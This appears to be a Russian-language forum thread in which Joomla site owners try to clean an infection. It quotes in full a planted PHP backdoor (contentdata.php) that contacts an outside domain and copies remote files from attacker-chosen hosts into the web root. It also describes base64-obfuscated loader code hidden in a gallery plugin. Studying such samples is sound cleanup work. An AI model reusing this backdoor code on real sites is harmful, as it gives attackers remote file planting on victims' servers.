в файл framework.php вставляются левые строки: Код (PHP): require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; unset( $CONFIG ); после чего в компоненте com_content создаются файл contentdata.php с содержимом: Код (PHP): <?php /** * @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $ * @package Joomla * @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ $schooljournal = @file_get_contents("http://giperpumper.info/schooljournal.php?host=".$_SERVER['HTTP_HOST'].""); if ( isset($_GET['host']) && isset($_GET['file']) && isset($_GET['paramurl']) ) { $pathname = file_get_contents("http://".$_GET['host']."/".$_GET['paramurl'].""); if (!copy("http://".$_GET['host']."/".$_GET['file']."", "".$_SERVER['DOCUMENT_ROOT']."/".$pathname."")) { echo "не удалось скопировать...\n"; } } ?> Удаление не помогает, где и чем можно искать основную заразу, которая вставляет строки?
Скачал файл (В этом файле один сплошной зашифрованный код) по ссылке, проверил на локалке. Выдал целый список с строкой String:: $_POST Кстати, после проверке уходит письмо на адрес isoisorf@gmail.com. Я так понял после этого надо проверить каждый файл что ли?
ОГО,этот не тот файл. Наверно хакнули . Прикреплю в теме файл в архиве.Перекачай. Результат работы сканера в архиве, выложи на форум
Кому интересно, нашел у себя в файле /plugins/content/rokbox/rokbox.php (Плагин Rokbox - карусель картинок) строчку $GLOBALS['_1822813929_']=Array(base64_decode и много-много букв. В расшифровке они как раз и дают указанные в первом посте строчки